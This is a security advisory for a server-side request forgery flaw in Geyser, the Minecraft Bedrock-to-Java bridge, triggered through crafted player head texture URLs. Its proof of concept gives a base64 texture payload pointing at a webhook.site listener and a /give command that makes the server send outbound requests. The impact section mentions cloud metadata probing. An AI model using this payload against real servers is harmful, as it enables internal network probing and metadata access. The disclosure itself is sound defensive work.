Launch Week Day 1: Announcing Security Design Review
Start for Free
LOW 2.4 Maven

Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser

GHSA-xcfg-fcr5-gw9r · CVE-2026-42188

Published · Modified

Description

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data.
By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints.
This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution.
However, the URL contained in the textures.SKIN.url field is not sufficiently validated.

PoC

  1. Setup Environment:

    • Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.
    • Ensure you have a Bedrock client connected.

  2. Prepare Listener:

    • Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).

  3. Construct Payload:

    • Create a JSON payload pointing to your listener URL:
      {"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}
    • Encode this JSON string to Base64.
      (You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)

  4. Execute Command:

    • Run the following command in the Bedrock Edition client:
      /give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]

  5. Verify:

    • Check the webhook.site dashboard.
    • You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties

  • Minecraft servers running Geyser
  • Server operators exposing internal or cloud metadata endpoints

Potential Impacts

  • Internal network probing (e.g., intranet services, admin panels)
  • Cloud metadata access attempts (e.g., 169.254.169.254)
  • IP address disclosure of the Minecraft server
  • Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

  • Network mapping
  • Firewall bypass attempts
  • Cloud environment fingerprinting

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes